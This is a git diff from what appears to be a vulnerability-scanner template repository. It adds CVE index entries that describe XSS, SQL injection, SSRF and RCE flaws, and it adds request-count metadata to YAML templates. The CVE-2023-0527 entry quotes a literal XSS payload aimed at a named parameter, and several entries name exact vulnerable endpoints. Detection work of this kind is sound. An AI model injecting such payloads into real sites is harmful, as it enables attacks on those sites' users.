Add Announcement function at /index.php?module=help_pages/pages\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44944.yaml"} +{"ID":"CVE-2022-44946","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44946.yaml"} +{"ID":"CVE-2022-44947","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44947.yaml"} +{"ID":"CVE-2022-44948","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44948.yaml"} +{"ID":"CVE-2022-44949","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44949.yaml"} +{"ID":"CVE-2022-44950","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44950.yaml"} +{"ID":"CVE-2022-44951","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44951.yaml"} +{"ID":"CVE-2022-44952","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44952.yaml"} {"ID":"CVE-2022-45037","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45037.yaml"} {"ID":"CVE-2022-45038","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45038.yaml"} {"ID":"CVE-2022-45362","Info":{"Name":"WordPress Paytm Payment Gateway \u003c=2.7.0 - Server-Side Request Forgery","Severity":"high","Description":"WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-45362.yaml"} @@ -1784,6 +1808,7 @@ {"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"} {"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"} {"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"} +{"ID":"CVE-2023-0514","Info":{"Name":"Membership Database \u003c= 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0514.yaml"} {"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"} {"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"} {"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"} @@ -1801,13 +1826,19 @@ {"ID":"CVE-2023-1454","Info":{"Name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1454.yaml"} {"ID":"CVE-2023-1496","Info":{"Name":"Imgproxy \u003c 3.14.0 - Cross-site Scripting (XSS)","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1496.yaml"} {"ID":"CVE-2023-1671","Info":{"Name":"Sophos Web Appliance - Remote Code Execution","Severity":"critical","Description":"A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1671.yaml"} +{"ID":"CVE-2023-1730","Info":{"Name":"SupportCandy \u003c 3.1.5 - Unauthenticated SQL Injection","Severity":"critical","Description":"The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1730.yaml"} +{"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"} +{"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"} +{"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"} {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"} {"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"} {"ID":"CVE-2023-20889","Info":{"Name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","Severity":"high","Description":"Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20889.yaml"} {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} +{"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"medium","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"} {"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} +{"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"} {"ID":"CVE-2023-22897","Info":{"Name":"Securepoint UTM - Leaking Remote Memory Contents","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22897.yaml"} {"ID":"CVE-2023-23333","Info":{"Name":"SolarView Compact 6.00 - OS Command Injection","Severity":"critical","Description":"SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23333.yaml"} {"ID":"CVE-2023-23488","Info":{"Name":"WordPress Paid Memberships Pro \u003c2.9.8 - Blind SQL Injection","Severity":"critical","Description":"WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23488.yaml"} @@ -1861,6 +1892,8 @@ {"ID":"CVE-2023-30019","Info":{"Name":"Imgproxy \u003c= 3.14.0 - Server-side request forgery (SSRF)","Severity":"medium","Description":"imgproxy \u003c=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30019.yaml"} {"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"} {"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} +{"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"} +{"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"} {"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"} {"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"} {"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"medium","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"} @@ -1877,3 +1910,6 @@ {"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"high","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} {"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} {"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} +{"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"} +{"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} +{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross-site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 5948d863b7..ece42bdf4a 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -be483aa0e41e51f1744cd9bd05cb8c4d +4e9ea5be8a9b61669726b0fe75ee163e From cb26083079a7852cfea40b1abeb638fe559d6377 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:17:58 +0000 Subject: [PATCH 498/609] TemplateMan Update [Fri Jul 7 11:17:58 UTC 2023] :robot: --- http/cves/2019/CVE-2019-14789.yaml | 1 + http/cves/2020/CVE-2020-19515.yaml | 3 ++- http/cves/2020/CVE-2020-35985.yaml | 1 + http/cves/2020/CVE-2020-35987.yaml | 1 + http/cves/2022/CVE-2022-4295.yaml | 3 ++- http/cves/2022/CVE-2022-43165.yaml | 3 ++- http/cves/2022/CVE-2022-43166.yaml | 1 + http/cves/2022/CVE-2022-43169.yaml | 1 + http/cves/2022/CVE-2022-43170.yaml | 1 + http/cves/2022/CVE-2022-43185.yaml | 1 + http/cves/2022/CVE-2022-44944.yaml | 3 ++- http/cves/2022/CVE-2022-44946.yaml | 3 ++- http/cves/2022/CVE-2022-44947.yaml | 3 ++- http/cves/2022/CVE-2022-44948.yaml | 1 + http/cves/2022/CVE-2022-44949.yaml | 1 + http/cves/2022/CVE-2022-44950.yaml | 1 + http/cves/2022/CVE-2022-44951.yaml | 1 + http/cves/2022/CVE-2022-44952.yaml | 1 + http/cves/2023/CVE-2023-0514.yaml | 1 + http/cves/2023/CVE-2023-1730.yaml | 3 ++- http/cves/2023/CVE-2023-1835.yaml | 1 + http/cves/2023/CVE-2023-1890.yaml | 1 + http/cves/2023/CVE-2023-2023.yaml | 3 ++- http/cves/2023/CVE-2023-2272.yaml | 1 + http/cves/2023/CVE-2023-30256.yaml | 1 + http/cves/2023/CVE-2023-30777.yaml | 1 + http/cves/2023/CVE-2023-36287.yaml | 1 + http/cves/2023/CVE-2023-36289.yaml | 1 + http/cves/2023/CVE-2023-36346.yaml | 1 + http/exposed-panels/qdpm-login-panel.yaml | 3 ++- http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml | 1 + .../vulnerabilities/wordpress/leaguemanager-sql-injection.yaml | 1 + http/vulnerabilities/wordpress/notificationx-sqli.yaml | 1 + http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml | 1 + 34 files changed, 43 insertions(+), 9 deletions(-) diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index fa9427a85d..f290e3bfad 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 metadata: + max-request: 2 verified: true tags: cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index ad8ee4f768..ea298337d2 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -16,8 +16,9 @@ info: cve-id: CVE-2020-19515 cwe-id: CWE-79 metadata: - verified: true + max-request: 1 shodan-query: http.favicon.hash:762074255 + verified: true tags: cve,cve2020,xss,qdpm,unauth http: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 06f833058c..a64d205dcc 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 32b3c05c29..538054c542 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2020-35987 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index ccecc02849..3af1a2df53 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -15,8 +15,9 @@ info: cve-id: CVE-2022-4295 cwe-id: CWE-79 metadata: - verified: true + max-request: 1 publicwww-query: /wp-content/plugins/show-all-comments-in-one-page + verified: true tags: cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page http: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 40009003ab..035567d925 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -16,8 +16,9 @@ info: cve-id: CVE-2022-43165 cwe-id: CWE-79 metadata: - verified: true + max-request: 3 shodan-query: http.favicon.hash:-1499940355 + verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 850177753b..dbd732a065 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-43166 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index d9e2414971..c54f5524ef 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-43169 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 3487ba0aea..08a468d06a 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-43170 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index 7c5d638e81..fb3a2a44ee 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-43185 cwe-id: CWE-79 metadata: + max-request: 3 verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index cdde910d64..c92a605ce7 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -16,8 +16,9 @@ info: cve-id: CVE-2022-44944 cwe-id: CWE-79 metadata: - verified: true + max-request: 3 shodan-query: http.favicon.hash:-1499940355 + verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 20e40fab41..858d78666e 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -16,8 +16,9 @@ info: cve-id: CVE-2022-44946 cwe-id: CWE-79 metadata: - verified: true + max-request: 3 shodan-query: http.favicon.hash:-1499940355 + verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 0b0bce72f2..44ff1b4b92 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -16,8 +16,9 @@ info: cve-id: CVE-2022-44947 cwe-id: CWE-79 metadata: - verified: true + max-request: 3 shodan-query: http.favicon.hash:-1499940355 + verified: true tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44948.yaml 